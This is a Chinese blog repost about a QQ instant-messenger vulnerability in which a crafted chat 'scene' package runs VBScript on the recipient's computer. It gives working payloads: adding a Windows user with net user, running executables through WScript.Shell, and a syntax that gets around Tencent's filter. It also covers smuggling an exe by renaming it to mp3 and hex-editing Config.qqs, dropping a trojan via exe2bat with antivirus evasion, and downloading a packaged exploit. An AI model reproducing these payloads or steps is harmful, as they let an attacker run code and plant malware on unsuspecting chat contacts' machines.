鬼仔:我这里测试有的成功,有的不成功,原因不明。同样的版本的情况下,有的成功,有的失败。比如同样的beta1,有的失败,有的成功,beta4也有的失败,有的成功。当然,VBScript.qqs中的脚本可以自己修改,达到别的目的。利用场景。懒得贴图了,自己测试吧。
来源:Crab's Blog
把那3个文件解到\Tencent\QQ\IMScene\Scene\
用记事本打开VBScript.qqs
最下边 有那个代码了
然后在场景中发给别人
下载:
qq.rar
相关资料(来源:雕牌's blog)
关于那QQ 0day 一点资料,现在把具体过程写出来,大家看看吧,也许有人能突破。我在blog上早就说明了,我不装B,这个QQ的测试,我从没拿外面的人测试,你们说,我算是装B么。再说了,我blog写这个的时候就说过,还在测试中,从没说已经成功利用,一直卡在执行文件那一步。
测试过程:
一开始和教主测试的时候是因为ms的播放器能够播放swf文件。这个我在上个月就写过文章了,当初是测试QQ场景的播放器,但是发现无法触发这个漏洞,因为这个播放器不是使用的MS播放的。所以后来教主貌似去测试别的东西了,我呢,继续测这个QQ,前几天测试的时候做了几个包,有弹框框的包,有传exe的包,有使对放QQ崩溃的包。这个QQ的漏洞想必大家应该都清楚了。我还是简单说说。
问题文件确实是在QQ场景里面,场景里面有一个图片文件和VBScript.qqs,Config.qqs,文件。每个文件的具体作用简单说说,那个图片文件不用说了,就是场景的背景。Config.qqs文件的内容是:
<Scene Type="1" BackGroupColor="#FFFFFF" FriendCaptionColor="#0000FF" MineCaptionColor="#000000" MsgTextColor="#000000" SystemRequestColor="#000000" SystemResultColor="#000000">
<Normal>
<SOUND Loop="true" SourcePath="E000001.mp3"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="true" SourcePath="E000001.mp3"/>
</ActionData>
</Action>
</Scene>
</theme>
一目了然。VBScript.qqs这个文件的作用是一段些'动画参数,初始化帧动画参数,初始化背景图片位置,场景窗口大小改变的时候重新布置场景等等事件的脚本。看文件名字就知道是VBS脚本。
但是这个VBS脚本不是用winds下的vbs.dll解析的,而是用的QQ自己目录下的一个vbs*.dll文件解析的。VBS能做什么,大家比我再清楚不过了,VBS下载者,执行,病毒。功能强大。加用户什么的都是轻而易举。这里给几个VBS脚本出来,大家如果对这个漏洞还有兴趣,可以自己去测试测试,
add user:
set objshell = wscript.createOBject("wscript.shell")
iReturn = objshell.Run("net user x x /add",0,TRUE)
run dos exe:
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe",0,TRUE)
run gui exe:
dim Js1
Js1 ="t1est.exe"
set wsh=WScript.CreateObject("WScript.Shell")
wsh.Run(Js1)
还有如果用VBS下载着记得免杀,因为测试的时候被杀,所以后来才去研究传任意文件。那么如何传任意文件,下面介绍的这个方法在我们测试期间都成功过,但是今天测试的时候貌似不成功。方法写出来。
这个方法也是在研究swf的时候发现的,因为制作场景不支持添加swf文件。后来就想办法。先制作QQ安装包,里面添加音乐。那音乐就是swf改后缀的文件。添加后再生成包。再用UE或者别的16进制编辑的。查找里面mp3后缀,改掉就成了。这个地方也许还有研究,就是他生成的文件为什么一定在QQ的 IMScene\Scene\这个目录呢,如果在这里就能改变他的路径,直接写到启动里面不就OK了,关于这个我没测试成功,还等待各位牛人发现。再次申明这个传任意文件的这个漏洞貌似TX已经封了,不是很清楚,也许今天测试掉了步骤。关于这个漏洞大家有什么看法,或者新的想法,可以跟帖,欢迎一起测试。
------------------------------------------
二,测试+利用
1,传任意文件
测试swf挂马的时候,是想把mp3直接换成swf,让场景播放器直接加载。没想到TX是用的自己的播放器。至于怎么传swf(或者传任意文件)。这个相信大家很想知道,先要去下一个QQ的场景编辑器(光盘中)。安装之后就把你要传的文件改成mp3格式。因为QQ的场景编辑器是不能识别其他的文件的。QQ的场景背景图,最好设置一下,不然白色背景对话全是黑色。一看就感觉不对劲。然后添加动作,在在属性设置里面添加音乐——图1。然后把改了后缀的音乐添加进去。然后用16进制编辑器——图2,把里面的EOOOOO1.mp3编辑成E000001.exe。再把安装文件Config.qqs里面的
<Normal>
<SOUND Loop="true" SourcePath="E000001.exe"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="false" SourcePath="E000001.exe"/>
对应改一下就可以了(当你们看到此文的时候估计TX已经封了)
2,运行VBS脚本
自己做过QQ场景的朋友对这几个文件应该比较熟悉了,Config.qqs,Setup.ini,VBScript.qqs。几个文件的具体作用,感兴趣的可以在网上搜搜,相关的资料。这里只说说VBScript.qqs这个文件,先看看部分代码,
code:
'动画参数
Dim g_bLoop(1)
Dim g_nMaxTime(1)
Dim g_nImageFrameCount(1, 0)
Dim g_bFrameImageAnimate(1, 0, 0)
Dim g_nFrameImageTime(1, 0, 0)
Dim g_nFrameImageLeft(1, 0, 0)
Dim g_nFrameImageTop(1, 0, 0)
…………
Sub Scene_OnInit(cx, cy)
'初始化帧动画参数
InitData
g_nCurAction = -1
g_nCurTime = 0
…………
'初始化背景图片位置
Scene_OnSize cx,cy
End Sub
到这里不少朋友应该知道这东西怎么利用了,这里是一写QQ场景的动画参数和始初化的参数。VBS脚本的作用大家最清楚的莫过于VBS下载者了。这里简单演示一下。函数msgbox,弹个警告框,可别小看这东西,帅哥可以泡MM,发些甜言蜜语。菜菜可以发这个吓吓大虾。在代码处——图3。下面加一句 “msgbox "QQ 0day by:www.52cmd.cn"”,再和别人聊天的时候发送场景——图4。场景是默认接受的,但是在对方会显示正在传送场景可以取消。一般人是不会怀疑那个东西,TX的东西嘛。传送完毕后会在对方。和本地出现——图5。
3,执行文件
执行文件是可以的,如果直接执行VBS下载者会出错,提示找不到对象wscript。原因是因为这个VBS脚本不是用winds下的vbscript.dll解析的,而是用的QQ自己目录下的一个vbscript.dll文件解析的。jiajia这家伙测试成功了,呵呵,编程厉害,我实在无言。下面简单说说方法,jiajia和我说的是TX过滤了部分危险字符,输出的时候就过滤了,像这个代码:
set objshell = wscript.createOBject("wscript.shell"),
加载在QQ场景里面提示出错,改成:
set objshell = createOBject("wscript.shell") ,就不出错但是不执行。经过测试发现要写成这样"CreateObject("Wscript.Shell").Run "C:\1.exe",0",才能成功。配合上面的传任意文件就能达到很好效果。但是传文件有时候会大大延长传场景的时间。有时候还会把对方QQ搞崩溃。jiajia想到一种好的方法,既免杀又方便。exe2bat大家都清楚吧。首先利用CreateObject("Scripting.FileSystemObject")把转过之后的代码通过fso.opentextfile,echo写到一个文件中,再用wscript.shell执行。具体点,首先BAT转EXE小工具把木马转成bat,图6。在把转过的代码通过fso写入文件。具体文件我打包了,大家一看就明白。大家如果对这个漏洞还有兴趣,可以自己去测试测试,但是估计大家看到此文的时候漏洞已经被TX封了。这里打包几个VBS脚本,留给有兴趣的人研究。还有什么不明白的去我blog看吧(www.52cmd.cn)最后感谢测试中帮助我的兄弟,教主,十三,jiajia